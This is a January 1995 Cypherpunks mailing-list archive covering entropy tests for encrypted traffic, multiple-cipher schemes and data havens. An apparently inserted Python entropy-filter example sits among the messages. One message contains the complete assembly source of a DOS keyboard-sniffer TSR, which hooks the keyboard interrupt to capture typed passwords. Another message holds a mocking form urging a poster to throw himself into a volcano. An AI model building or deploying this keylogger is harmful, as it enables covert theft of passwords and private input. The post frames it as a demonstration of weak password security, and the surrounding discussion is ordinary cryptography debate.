>just to detect ASCII armor with a regular expression recognizer and
>de-armor it before the entropy check.
>
>Eric
>
>

Won't work! You can always embed an encrypted message in what 'looks' like plaintext. A trivial example: Encrypt a message with a caesar cypher, then build a story where the first char of each word maps to each subsequent char from the encrypted text. At the cost of expanding the size of the message by a factor of 5 to 10 you've hidden the encrypted message in what looks like a letter to your mother (or a news story in the NY Times, etc.) This is an old technique.

Dale H.

From jrochkin at cs.oberlin.edu Wed Jan 11 22:00:26 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 11 Jan 95 22:00:26 PST
Subject: How do I know if its encrypted?
Message-ID:

At 12:40 AM 01/12/95, Dale Harrison (AEGIS wrote:
>Won't work! You can always embed an encrypted message in what 'looks'
>like plaintext. A trivial example: Encrypt a message with a caesar
>cypher, then build a story where the first char of each word maps to
>each subsequent char from the encrypted text. At the cost of expanding
>the size of the message by a factor of 5 to 10 you've hidden the
>encrypted message in what looks like a letter to your mother (or a news
>story in the NY Times, etc.) This is an old technique.

The context this was being discussed in, was trying to make _plaintext_ look like _ciphertext_. The operator of a data haven or remailer might hypothetically want to ensure that all text he dealt with was encrypted. So your method wouldn't do anything in that area. Unless you can think of a way to embed plaintext in ciphertext in such a way that it looks like ciphertext, and my guess is that any method that did that well would be sufficiently obscure as to be analogous to encryption for our purposes. Really bad encryption, with very little point, but still hidden text. Which is the real point, the operator doesn't want to deal with any text that isn't "hidden" in some way.

Of course, we're not just dealing with text.
So the scheme has got to be changed a bit so as to be able to detect unencrypted GIFs, and mu-law files, and as yet to be determined unknown files. I don't know enough about what's being talked about to know if this entropy detecting stuff will generalize to non text files. Cause we want to catch unencrypted GIFs too.

[And doesn't compression alone do similar things to the entropy as encryption does, anyhow? If someone compresses their file with a good compression algorithm, as I understand it the non-randomness left will be pretty low. But it won't meet the needs we're discussing, I don't think.]

From cactus at seabsd.hks.net Wed Jan 11 22:02:54 1995
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Wed, 11 Jan 95 22:02:54 PST
Subject: Multiple symetric cyphers
Message-ID: <199501120607.BAA19021@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501120502.VAA29808 at largo.remailer.net>, Eric Hughes wrote:
> From: cactus at seabsd.hks.net (L. Todd Masco)
>
> I'm wondering: would the strength be increased by using a randomly selected
> symmetric cypher?
>
>Strength is not the right aspect. Global risk is reduced, simply because
>the aggregate cost of a breach is reduced.

Isn't it? If an attacker does not know what cipher is used and breaking each is computationally expensive (though not prohibitively so) doesn't that add extra complexity?

IE, if cipher A, B, and C are attackable in large but not prohibitive time, wouldn't an attacker have to spend more cycles to break something that was randomly one of those? I agree that it's not a significantly large jump, but if an attacker has to go through all the possibilities for A, B, before breaking something in C, it seems that there's a small increase in strength

(Not being argumentative, really... I understand that this increase in strength isn't enough to warrant any significant effort. Just want to clarify the answer in my mind).
>But selecting a single cipher is just as much a fixed policy as a
>randomly selected one is. Far better to let the user pick a policy,
>both about sent and accepted ciphers.

Sure. Ideally, a user could say "use A" or "use randomly A, C, or D" or even "use A_x(C_x) or B_x(D_y)". I'm not certain the "accept" is a great idea, but what the hell... any theoretical general system should have support for such a decision to be made, right? As failure modes multiply...

> I guess this reduces to: do strong cyphers have "signatures" of some sort,
> by which the type of encryption can be derived?
>
>If they do, they're likely not _strong_ ciphers.

Great... that's the answer I was looking for, and what my gut feeling was. I'm trying to determine how much rope is too much for a first pass.

Related: is there, in general or in any known specific cases, any loss of security in using sym. cipher A on ciphertext B (of another sym. cipher) with the same key? With different keys (I would think not, but I vaguely remember mention of something here long ago)?

- - --
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxSMSBNhgovrPB7dAQECKQP/fqXwOcRmH6Z5dm8fsDnFzkCNyy5bc7Os
+/hWmyjlk6/qx2Ym0gvlIZaxMSVR68E1qQUaoiAaWY7SatskU8o6dZRI+SmON4NV
qSZnBh/+TnQwcTK0c0N+4m3Y8GhIk0ERX9modZfadv15Q07yfP7MXEj4yRQOse6e
WHmUg0WOhW4=
=GedZ
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxTHISoZzwIn1bdtAQEUbAGAuX+ALOTHZkUd8vqsWzVZWKSKwnJ+03yW
alp18VGBGaM4PLQWU0OAFmbBP8wUxBEz
=U5tO
-----END PGP SIGNATURE-----

From carolb at barton.spring.com Wed Jan 11 22:09:43 1995
From: carolb at barton.spring.com (Censored Girls Anonymous)
Date: Wed, 11 Jan 95 22:09:43 PST
Subject: Microsoft TrueName (tm)
Message-ID:

Praise Bob! The Rev. Ivan Stang's been preaching that for years! Long live the Slackmaster!

RegisteredBEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..."
The TS NET REVOKED PGP KEY NO.0C91594D
carolb at spring.com carolann at mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

From eric at remailer.net Wed Jan 11 22:09:55 1995
From: eric at remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 22:09:55 PST
Subject: How do I know if its encrypted?
In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com>
Message-ID: <199501120608.WAA29936@largo.remailer.net>

   From: daleh at ix.netcom.com (Dale Harrison (AEGIS))

   Won't work! You can always embed an encrypted message in what 'looks' like plaintext.

So people can write special software that gets their message rejected by an entropy filter. This is a disadvantage? It looks like an irrelevancy to me.

Seems to me that a quite reasonable condition of use of a remailer is that what is passed isn't human readable.

Eric

From craig at passport.ca Wed Jan 11 22:19:35 1995
From: craig at passport.ca (Craig Hubley)
Date: Wed, 11 Jan 95 22:19:35 PST
Subject: Reefer madness
In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com>
Message-ID:

Seems to me I have seen something like this cybersmut hype before... wasn't it called 'Reefer Madness'?
Craig

From daleh at ix.netcom.com Wed Jan 11 22:32:15 1995
From: daleh at ix.netcom.com (Dale Harrison AEGIS)
Date: Wed, 11 Jan 95 22:32:15 PST
Subject: How do I know if its encrypted?
Message-ID: <199501120631.WAA27345@ix2.ix.netcom.com>

You wrote:
>
>The context this was being discussed in, was trying to make _plaintext_
>look like _ciphertext_. The operator of a data haven or remailer might
>hypothetically want to ensure that all text he dealt with was encrypted.
>So your method wouldn't do anything in that area.

The discussion was one of whether you could distinguish plaintext from cyphertext by doing a statistical analysis of the datastream, i.e. can you tell one from the other without actually reading each message. The answer is no.

Dale H.

From daleh at ix.netcom.com Wed Jan 11 22:47:38 1995
From: daleh at ix.netcom.com (Dale Harrison AEGIS)
Date: Wed, 11 Jan 95 22:47:38 PST
Subject: How do I know if its encrypted?
Message-ID: <199501120646.WAA28573@ix2.ix.netcom.com>

You wrote:
>So people can write special software that gets their message rejected
>by an entropy filter. This is a disadvantage? It looks like an
>irrelevancy to me.
>

It's an artificial example, but one that points out that merely doing a frequency analysis on the datastream isn't enough to guarantee the correct answer. Reliable remailer software will have to worry about false positives as well as false negatives; especially if it's a fee-for-service operation. This might also be a nice feature if you're trying to dodge an NSA filter.

>Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.
>

Of course the implicit assumption in that statement is that encrypted traffic hasn't been outlawed or regulated, or that the sender doesn't want to 'appear' to be sending encrypted traffic.
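
The filter Eric Hughes describes in this thread (monogram entropy over the first couple of kilobytes, with ASCII armor recognized by a regular expression and decoded first), as an added Python example that is not code from any poster. The 7.0 bits-per-byte threshold, the 512-byte minimum, every function name and all sample messages are assumptions constructed here; the run also shows the limits Jonathan Rochkind and Tim May raise, since compressed cleartext and a random-looking file carrying a short English string both pass.

```python
import base64
import binascii
import hashlib
import math
import re
import zlib
from collections import Counter

SAMPLE_BYTES = 2048  # "the first couple of kilobytes"
MIN_BYTES = 512      # assumed floor: fewer bytes cannot approach 8 bits/byte
THRESHOLD = 7.0      # assumed cut-off in bits per byte (armor sits near 6)

# Recognizer for a PGP armor block: header lines, blank line, base64 body,
# optional "=XXXX" checksum line (not verified here), END line.
ARMOR_RE = re.compile(
    rb"-----BEGIN PGP MESSAGE-----\r?\n"
    rb"(?:[A-Za-z]+: [^\r\n]*\r?\n)*\r?\n"
    rb"(?P<body>(?:[A-Za-z0-9+/]+=*\r?\n)+)"
    rb"(?:=[A-Za-z0-9+/]{4}\r?\n)?"
    rb"-----END PGP MESSAGE-----"
)


def monogram_entropy(data: bytes) -> float:
    """Shannon entropy of the single-byte distribution, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def dearmor(message: bytes):
    """Return the decoded armor payload, or None if no valid block is found."""
    match = ARMOR_RE.search(message)
    if match is None:
        return None
    try:
        return base64.b64decode(b"".join(match.group("body").split()))
    except binascii.Error:
        return None


def classify(message: bytes, decode_armor: bool = True):
    """Return (verdict, entropy) for the leading sample of the message."""
    payload = dearmor(message) if decode_armor else None
    sample = (message if payload is None else payload)[:SAMPLE_BYTES]
    entropy = monogram_entropy(sample)
    if len(sample) < MIN_BYTES:
        return ("too-short", entropy)
    return ("accept" if entropy >= THRESHOLD else "reject", entropy)


# ---- constructed sample inputs (nothing below comes from real traffic) ----

def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic stand-in for ciphertext: a SHA-256 counter stream."""
    blocks = (hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
              for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]


def armor(data: bytes) -> bytes:
    """Wrap data in a PGP-style armor block (checksum line left out)."""
    b64 = base64.b64encode(data)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return (b"-----BEGIN PGP MESSAGE-----\nVersion: 2.6.2\n\n"
            + b"\n".join(lines) + b"\n-----END PGP MESSAGE-----\n")


WORDS = (b"the remailer operator wants every message passed to be encrypted "
         b"and not human readable so a filter checks entropy first").split()


def pseudo_english(n_words: int) -> bytes:
    """Constructed cleartext: WORDS picked in a pseudo-random order."""
    return b" ".join(WORDS[b % len(WORDS)]
                     for b in pseudo_random(n_words, b"words"))


def run_samples():
    """Classify each constructed sample; entropy is rounded for display."""
    cleartext = pseudo_english(3000)
    cipher = pseudo_random(4096)
    note = b"This is not a real encrypted file"
    tagged = cipher[:100] + note + cipher[100 + len(note):]
    cases = {
        "cleartext": classify(cleartext),
        "ciphertext": classify(cipher),
        "armored ciphertext": classify(armor(cipher)),
        "armor, not decoded": classify(armor(cipher), decode_armor=False),
        "compressed cleartext": classify(zlib.compress(cleartext, 9)),
        "ciphertext + short English": classify(tagged),
    }
    return {name: (v, round(h, 2)) for name, (v, h) in cases.items()}


if __name__ == "__main__":
    for name, (verdict, entropy) in run_samples().items():
        print(f"{name:28s} {verdict:9s} {entropy:.2f} bits/byte")
```
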
From carolb at barton.spring.com Wed Jan 11 22:47:59 1995
From: carolb at barton.spring.com (Censored Girls Anonymous)
Date: Wed, 11 Jan 95 22:47:59 PST
Subject: Finally got on
In-Reply-To: <199501120317.TAA07919@well.sf.ca.us>
Message-ID:

Hope the information, under separate cover did the job.

RegisteredBEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..."
The TS NET REVOKED PGP KEY NO.0C91594D
carolb at spring.com carolann at mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

From tcmay at netcom.com Wed Jan 11 22:49:51 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 22:49:51 PST
Subject: How do I know if its encrypted?
In-Reply-To:
Message-ID: <199501120648.WAA12523@netcom5.netcom.com>

Jonathan Rochkind wrote:

> The context this was being discussed in, was trying to make _plaintext_
> look like _ciphertext_. The operator of a data haven or remailer might
> hypothetically want to ensure that all text he dealt with was encrypted.
> So your method wouldn't do anything in that area. Unless you can think of
> a way to embed plaintext in ciphertext in such a way that it looks like
> ciphertext, and my guess is that any method that did that well would be

As I said in a recent message, there is no general way to "prove" that a file is encrypted, only to have pretty good confidence that it is. (This is at the core of algorithmic information theory, a la Kolmogorov and Chaitin, goes to the heart of what is meant by "randomness," and is linked as well to the halting problem and other such stuff.)

I had a need to actually do what Jonathan is talking about: make a file look like it was encrypted but actually have a simple text message in it.
My application was an experiment to bait the line for some thought policemen who decided that they would decide which pictures were appropriate and which were not. So, I created a plausible-looking PGP-like file and posted it to the new group "alt.binaries.pictures.erotica.children" and announced that an "interesting" picture existed there.

The squeals of the net.cops were impressive to behold! Demands to Netcom that I be expelled from the Net, that the "Child Welfare Agents" would soon be breaking down my doors, etc.

But, given the climate of our time (this was in July 1993) and given the potential failure of the "It's not a _real_ file" defense, I protected myself in an easy way, by running an English message down the diagonal, saying something like "This is not a real encrypted file," etc. Even a lawyer would have to admit that no real encrypted file could have English emerging randomly. Entropy, and all that.

So, this was an ostensibly encrypted file which contained unencrypted text. It would very likely have passed any tests for "randomness" and hence would have been passed by any "encrypted only" filters. (The English text was a tiny fraction of the entire file, so the deviation from near-maximal entropy would likely go undetected. Fluctuations would be larger, depending on file size.)

Nobody spotted the message. After several days, I "let the truth be told," which of course enraged others.

I thought this digression might be amusing to some.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com      | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks.
FAQ available at ftp.netcom.com in pub/tc/tcmay

From daleh at ix.netcom.com Wed Jan 11 22:51:52 1995
From: daleh at ix.netcom.com (Dale Harrison AEGIS)
Date: Wed, 11 Jan 95 22:51:52 PST
Subject: How do I know if its encrypted?
Message-ID: <199501120650.WAA28898@ix2.ix.netcom.com>

You wrote:
>So people can write special software that gets their message rejected
>by an entropy filter. This is a disadvantage? It looks like an
>irrelevancy to me.
>

It's an artificial example, but one that points out that merely doing a frequency analysis on the datastream isn't enough to guarantee the correct answer. Reliable remailer software will have to worry about false positives as well as false negatives; especially if it's a fee-for-service operation. This might also be a nice feature if you're trying to dodge an NSA filter.

>Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.
>

Of course the implicit assumption in that statement is that encrypted traffic hasn't been outlawed or regulated, or that the sender doesn't want to 'appear' to be sending encrypted traffic.

From m00012 at KANGA.STCLOUD.MSUS.EDU Wed Jan 11 23:02:56 1995
From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU)
Date: Wed, 11 Jan 95 23:02:56 PST
Subject: keyboard sniffer TSR source code...
Message-ID: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU>

For Dos operating systems. I wrote this in a weekend, and no longer wish to work with it. I will release it as is....do not ask for support, and if you know where I work, they have no idea I am doing this, so don't make any assumptions about my company's software.

But, here it is, the source code for a keyboard sniffer program. After you assemble it, link it, turn it into a .com file, and execute it, just hit page up for a display of the first half of the buffer, and page down for a display of the second half of the buffer.
Then, test it out with pgp or other dos based programs that ask you for a password (use a fake one), and you will probably see how insecure most of these programs are. Mike -----cut here---- ; Keyboard sniffer TSR ; ; asm kbs.asm ; link kbs.obj ; exe2bin kbs kbs.exe ; ;Notes: This is a keyboard sniffer program. It is intended to ; show how easy it is to make your computer insecure. ; This program hooks itself to the keyboard interrupt routine. ; It is not difficult to imagine a routine that simply replaced ; the keyboard interrupt routine, or simply monitored the ; keyboard buffer and pointers from another interrupt routine, ; e.g., the timer interrupt. ; It is also not a stretch of the imagination to say that it is ; possible that a program that monitors the keyboard buffer and ; display area for things that look like passwords (e.g., look ; for certain prompts, store next 500 characters) to either an ; unused area of the disk, or a hidden file, already exists. ; That is to say, the FBI, for example, could have already ; hired some programmers to come up with a .gif viewer that ; also attaches a keyboard sniffer to your system snooping ; for passwords, in the hopes that if and when the find a ; suspected (fill-in-the-blank) "crimminal", all they have ; to do is find the secret file created with their trojan TSR. ; ; ; ; KB_INT_NUM EQU 9 ;keyboard interrupt BUFFER_SIZE EQU 0b94H ;our buffer size, 19 lines 2 buffers TLC EQU 0C9H ;top left corner HL EQU 0CDH ;horizontal line TRC EQU 0BBH ;top right corner VL EQU 0BAH ;vertical line BLC EQU 0C8H ;bottom left corner BRC EQU 0BCH ;bottom right corner LCT EQU 0CCH ;left center tap RCT EQU 0B9H ;right center tap ALTPGUP EQU 9900H ALTPGDN EQU 0A100H ROM_BIOS_DATA SEGMENT AT 40H ;bios statuses and kb buffer ORG 1AH ;absolute KB_HEAD DW ? ;head of kb buffer KB_TAIL DW ? ;tail of kb buffer KB_BUFFER DW 16 DUP (?) 
;The keyboard buffer KB_BUFFER_END LABEL WORD ROM_BIOS_DATA ENDS CODE_SEG SEGMENT ASSUME CS:CODE_SEG ORG 100H ; .com file FIRST: JMP INSTALL_INTERRUPTS_MAIN ; data area... buffer db BUFFER_SIZE dup ('*') head dw 5 tail dw 5 cnt dw ? ind dw ? show_buff dw 0 lkb_tail dw 0 ;last key board til ;this is for programs that leave ;the character in bios buffer ;past one interrupt, e.g., pgp OLD_KB_INTERRUPT LABEL WORD OLD_KB_INTERRUPT_ADDR DD ? row db ? idstring db "0x5fcf9eb78a01ef28" ;18 long KBINTERRUPT PROC NEAR ASSUME CS:CODE_SEG PUSH AX PUSH BX PUSH CX PUSH DX PUSH DI PUSH SI PUSH DS PUSH ES PUSHF CALL OLD_KB_INTERRUPT_ADDR CLI ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA MOV DS,BX ; point ds to ROM_BIOS_AREA... MOV BX,KB_TAIL CMP BX,KB_HEAD JE nogo1 ;origianal keyboard interrupt has deleted char jmp short go1 mov cx,bx nogo1: jmp kbexit2 ;too far for je... go1: ;check to see if we already processed this character mov cx,bx ASSUME DS:CODE_SEG mov bx,cs mov ds,bx cmp cx,lkb_tail ;is it the same as last time? jne go3 ;no ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA mov ds,bx jmp kbexit2 go3: mov lkb_tail,cx ;save new tail ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA mov ds,bx mov bx,cx SUB BX,2 CMP BX,OFFSET KB_BUFFER ;did we wrap around? JAE NO_WRAP ;no MOV BX,OFFSET KB_BUFFER_END ;yes SUB BX,2 NO_WRAP:MOV DX,[BX] ; char in DX now... CMP DX,ALTPGUP ;altpgup hit? jne checknext1 ;no jmp short go2 ;yes, display first half of buffer checknext1: CMP DX,ALTPGDN ;altpgdn hit? jne nogo2 ;no mov kb_tail,bx ;delete alt pgdn from kb_buffer assume ds:code_seg mov cx,bx mov bx,cs mov ds,bx xor bx,bx ;garbage last tail mov lkb_tail,bx mov bx,offset buffer;yes, display second half of buffer add bx,BUFFER_SIZE/2 mov show_buff,bx call dump_buffer ;dump second half jmp kbexit1 nogo2: jmp save_key ;too far for jne.. 
go2: assume ds:rom_bios_data mov cx,bx mov bx,rom_bios_data mov ds,bx mov bx,cx mov kb_tail,bx ;delete ' pgup' from kb_buffer assume ds:code_seg mov cx,bx mov bx,cs mov ds,bx xor bx,bx ;garbage last tail mov lkb_tail,bx mov bx,offset buffer ;first half buffer mov show_buff,bx call dump_buffer ;dump first half jmp kbexit1 save_key: ASSUME DS:CODE_SEG MOV BX,CS MOV DS,BX mov bx,offset buffer add bx,head mov [bx],dl ;dh? inc bx mov cx,offset buffer add cx,BUFFER_SIZE cmp bx,cx ; at end of buffer? jz wrap_it ; yes sub bx,offset buffer mov head,bx jmp kbexit1 wrap_it: xor bx,bx mov head,bx jmp kbexit1 kbexit1: ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA MOV DS,BX kbexit2: POP ES POP DS POP SI POP DI POP DX POP CX POP BX POP AX STI IRET KBINTERRUPT ENDP dump_buffer PROC NEAR ASSUME DS:CODE_SEG MOV BX,CS MOV DS,BX STI jmp over_data sl1 db " Keyboard Sniffer Program ",0 sl2 db " Short Circuit, Inc. Version: 0.72 (Beta), (C)opyright 1995 ",0 over_data: mov dh,0 ;row mov dl,0 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? mov al,TLC ;top left corner mov ah,0ah ;service int 10h mov dh,0 ;row mov dl,4fh ;column = 79 dec mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? mov al,TRC ;top right corner mov ah,0ah ;service int 10h mov dh,17h ;row mov dl,0 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? mov al,BLC ;bottom left corner mov ah,0ah ;service int 10h mov dh,17h ;row mov dl,4fh ;column=79 dec mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,1 ;count? 
mov al,BRC ;bottom right corner mov ah,0ah ;service int 10h mov cx,4eh ;78 dec mov dh,0 ;row mov dl,1 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,4eh ; 78 characters mov al,HL ;horizontal line mov ah,0ah ;service int 10h ;put char mov dh,3 ;row mov dl,1 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,4eh ; 78 characters mov al,HL ;horizontal line mov ah,0ah ;service int 10h ;put char mov dh,17h ;row mov dl,1 mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov bh,0 ;page mov cx,4eh ;count mov al,HL ;horizontal line mov ah,0ah ;service int 10h ;put char mov cx,16h ;22 lines dline: mov dh,cl ;row mov dl,0 ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov dx,cx ;save cx mov bh,0 ;page mov cx,1 ;count mov al,VL ;vertical line mov ah,0ah ;service int 10h mov cx,dx ;restore cx mov dh,cl ;row mov dl,4fh ;column mov bh,0 ;page mov ah,2 ;service int 10h ;set cursor position mov dx,cx ;save cx mov bh,0 ;page mov cx,1 ;count mov al,VL ;vertical line mov ah,0ah ;service int 10h mov cx,dx ;restore cx loop dline mov dh, 3h ;row mov dl, 0 mov bh, 0 ;page mov ah, 2 ;service int 10h ;set cursor position mov bh, 0 ;page mov cx, 1 ;count mov al,LCT ;horizontal line mov ah,0ah ;service int 10h ;put char mov dh, 3h ;row mov dl, 4fh ;column mov bh, 0 ;page mov ah, 2 ;service int 10h ;set cursor position mov bh, 0 ;page mov cx, 1 ;count mov al,RCT ;horizontal line mov ah,0ah ;service int 10h ;put char mov cx, BUFFER_SIZE/2 -1 ;going backwards... mov ind, cx mov cl, 13h dorows: mov row, cl mov cx, 4eh ll0: mov cnt, cx mov dl, cl ;to end of line ;inc dl ;cnt was 1 too small mov dh,row inc dh inc dh inc dh mov ah,2 ;set cursor position mov bh,0 ;page 0 int 10h ;move to 0,0 mov bx,show_buff ;show_buff points to correct half... 
add bx,ind ;ind must have index, *(show_buff + ind) mov al,[bx] mov bh,0 mov cx,1 mov ah,0ah int 10h dec ind ;decrement index mov cx,cnt loop ll0 mov cl,row dec cl jnz dorows mov dh,1 mov dl,1 mov bx,offset sl1 call print_string mov dh,2 mov dl,1 mov bx,offset sl2 call print_string mov dh,18h mov dl,4 mov bh,0 mov ah,2 int 10h ;move back to correct position ret dump_buffer ENDP print_string PROC NEAR ;assumes ds==cs ;null terminated string, address in bx... ;row in dh ;col in dl ;uses bios int 10h, safe for tsr programs... jmp over_local_ps sadd dw ? over_local_ps: mov sadd,bx np: mov bh,0 mov ah,2 int 10h mov bx,sadd mov al,[bx] cmp al,0 ;is it 0? je pse ;yes, return inc bx mov sadd,bx inc dl mov bh,0 mov cx,1 mov ah,0ah int 10h jmp np ;next print (next character) pse: ret ;done, encountered 0 print_string ENDP ; Anything before this point stays in memory if it's okay to install... ; tests to see if kbs is already installed, returns ; zf=1 if it was already installed. ; zf=0 if it has not been previously installed. kbia PROC NEAR ;assumes ds points to code segment... MOV AH, 35H ;put old vector into es:bx MOV AL,KB_INT_NUM INT 21H mov si,offset idstring ;ds:si points to our string mov di,bx sub di, 12h ;es:di points to other string? 
mov cx,12h REPE cmpsb ret kbia endp INSTALL_INTERRUPTS_MAIN PROC NEAR ASSUME DS:CODE_SEG mov bx,cs mov ds,bx xor bx,bx mov head,bx mov tail,bx jmp over_temp_data instg db "Kbs installed.",0dh,0ah,"$" notinstg db "Kbs already installed.",0dh,0ah,"$" over_temp_data: call kbia je dont_install_it jmp install_it dont_install_it: mov dx,offset notinstg mov ah,09h int 21h mov bx,cs mov es,bx int 20h install_it: MOV AH, 35H ;put old vector into es:bx MOV AL,KB_INT_NUM INT 21H MOV OLD_KB_INTERRUPT,BX MOV OLD_KB_INTERRUPT[2],ES MOV AH,25H ;set new keyboard interrupt LEA DX,KBINTERRUPT INT 21H mov dx,offset instg mov ah,09h int 21h ASSUME DS:ROM_BIOS_DATA MOV BX,ROM_BIOS_DATA MOV DS,BX mov cx,KB_TAIL ASSUME DS:CODE_SEG MOV BX,CS MOV DS,BX mov lkb_tail,cx MOV DX, offset kbia ;ds:dx end of stay resident INT 27H ;allocate and stay resident INSTALL_INTERRUPTS_MAIN ENDP CODE_SEG ENDS END FIRST ; P.S. I haven't programmed in asm in a long time, no fair flaming ;me for poor programming style/ineffecient code. ; Use this code at your own rish. From m00012 at KANGA.STCLOUD.MSUS.EDU Wed Jan 11 23:05:03 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Wed, 11 Jan 95 23:05:03 PST Subject: How do I know if its encrypted? Message-ID: <0098A541.0A71B0E0.1313@KANGA.STCLOUD.MSUS.EDU> Check the entropy? From carolb at barton.spring.com Wed Jan 11 23:53:00 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Wed, 11 Jan 95 23:53:00 PST Subject: How do I know if its encrypted? (fwd) Message-ID: T.C. May, so eloquently waxed: The squeals of the net.cops were impressive to behold! Demands to Netcom that I be expelled from the Net, that the "Child Welfare Agents" would soon be breaking down my doors, etc. Nobody spotted the message. After several days, I "let the truth be told," which of course enraged others. I thought this digression might be amusing to some. --Tim May Did they write the standard "ticket"? 
form319.2(1/95)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* * * * *   N O T I C E   O F   N E T I Q U E T T E   B R E A C H   * * * * *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NOTICE: IT HAS COME TO OUR ATTENTION THAT YOU HAVE POSTED SOMETHING THAT HAS BEEN CONSIDERED WORSE THAN:

___ a Rush Limbaugh quote.
___ a Newt Gingrich joke.
___ a reference to Beavis & Butthead.
_X_ lame ASCII graphic(s) (Choose all that apply):
    ___ USS Enterprise
    _X_ Australia
    ___ The Amiga logo
    ___ Company logo (Mark only if above also)
        ___ and you stated that you don't speak for your employer.
    ___ Bicycle
    ___ Bart Simpson

Furthermore:

_x_ You have greatly misunderstood the purpose of ___the.news.group___ (newsgroup)
_x_ You have greatly misunderstood the purpose of the net.
_x_ You are a loser.
___ You must have spent your entire life in a skinner box to be this clueless.
_x_ *plonk*
_x_ This has been pointed out to you before. (see prior form)
_x_ It is recommended that you: (Mark all that apply)
    _x_ stick to FidoNet and come back when you've grown up.
    _x_ find a volcano and throw yourself in.
    ___ get a gun and shoot yourself.
    _x_ stop reading Usenet news and get a life.
    ___ stop sending email and get a life.
    ___ consume excrement.
    ___ consume excrement and thus expire.

Additional comments: My apologies to all responsible users who have had to view this horrible, lousy, lame, excuse for writing. I certainly hope this person gets their butt thrown in jail, but I'll settle for having their net access permanently revoked.

' . . . and thus ex

RegisteredBEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..."
The TS NET REVOKED PGP KEY NO.0C91594D
carolb at spring.com carolann at mm.com
************************************************************************
COMING SOON TO EVERY INTERNET NEWSGROUP NEAR YOU! . . . . . CENSORED.COM

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com      | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From carolb at barton.spring.com Thu Jan 12 00:32:22 1995
From: carolb at barton.spring.com (Censored Girls Anonymous)
Date: Thu, 12 Jan 95 00:32:22 PST
Subject: Data Havens..A consumer perspective
Message-ID:

1. You have what I want or need.
2. In order for me to let you store it, I will give it to you anyway you wish to get it.
3. I will let you do anything to the data you wish, so long as I get it back intact.
4. It is no concern (only idle curiosity maybe) where the data is parked.
5. I would expect to pay money for the safekeeping of my data.
6. I would expect the longer you hold the data, the more it will cost.
7. The only thing I am counting on is the data's timely retrieval.
8. Welcome to the world of data "coatchecking".

Why make it more complex than this?

>From the moment the data leaves their hands, until I return it, they have no right, nor I no obligation, to divulge anything about it. For they already would know, it would take a few minutes to retrieve it.

